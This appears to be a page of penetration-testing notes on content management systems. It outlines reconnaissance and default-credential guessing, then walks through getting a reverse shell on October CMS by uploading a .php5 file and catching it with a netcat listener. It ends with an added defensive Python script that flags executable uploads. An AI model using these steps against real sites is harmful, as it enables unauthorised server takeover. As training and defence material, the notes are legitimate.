# Content Management (CMS)

## Common

* [WordPress](https://pentest.mxhx.org/04-webapps/03-webapp-wordpress)
* [Magento](https://pentest.mxhx.org/04-webapps/magento)

## Basics

* Analyze:
  * Version
  * Addons
  * Themes
  * Blog Posts
* Vulnerabilities
  * Start with Unauthenticated
* Backend Admin Panel
  * dirb, gobuster
  * Panel Finder: <https://github.com/s0md3v/Breacher>
  * Guess, Default Creds, Brute-Force

## October CMS

* Open source self-hosted CMS platform
* Based on the Laravel PHP framework
* Look for unauthenticated exploits:
  * searchsploit october
  * Found: Vulnerable Upload php5 (authenticated)
* Google: "Vanilla forum download"
* Admin Panel:
  * Google "october cms admin login"
  * dirb <http://10.x.x.x>
  * <http://10.x.x.x/backend>
  * Try guessing: admin/admin
* Upload php5
  * October > Admin > Media > Upload > oct.php5
  * There is a button to execute the uploaded file
  * Catch with nc reverse shell or msfconsole

```
> locate php-reverse-shell.php
> cp php-reverse-shell.php .
> vim php-reverse-shell.php
(upload through GUI/Webpage)
> nc -nvlp 4444
connected !!
```
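
From the defender's side, the upload step above works because a `.php5` file reached a directory where the web server runs it. The following is an added example, not part of the original notes or of October CMS: a Python audit that walks a media directory and flags file names a PHP-enabled server may execute. The extension list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions that PHP-enabled web servers are commonly configured to execute.
# Assumption: the real set depends on the server's handler mapping; adjust it.
PHP_EXT = re.compile(r"^(php[0-9]?|phtml|pht|phar)$", re.IGNORECASE)


def classify(filename):
    """Return 'executable', 'embedded' or None for one uploaded file name."""
    parts = filename.split(".")[1:]          # every dot-separated suffix
    if not parts:
        return None
    if PHP_EXT.match(parts[-1]):
        return "executable"                  # e.g. oct.php5
    if any(PHP_EXT.match(p) for p in parts[:-1]):
        return "embedded"                    # e.g. a.php.jpg, risky with multi-extension handlers
    return None


def audit_uploads(root):
    """Walk an upload directory and return sorted (relative_path, finding) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            verdict = classify(name)
            if verdict:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel.replace(os.sep, "/"), verdict))
    return sorted(findings)


def demo():
    """Build a constructed media tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads", "public"))
        for rel in ("logo.png", "oct.php5", "uploads/public/report.pdf",
                    "uploads/public/avatar.PHTML", "uploads/banner.php.jpg"):
            with open(os.path.join(root, *rel.split("/")), "w") as fh:
                fh.write("constructed sample\n")
        return audit_uploads(root)


if __name__ == "__main__":
    for path, verdict in demo():
        print(f"{verdict:10} {path}")
```

Point `audit_uploads()` at the site's media storage path; any hit is a file to review, and a reason to switch the upload filter to an extension allowlist and to disable script execution in that directory.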
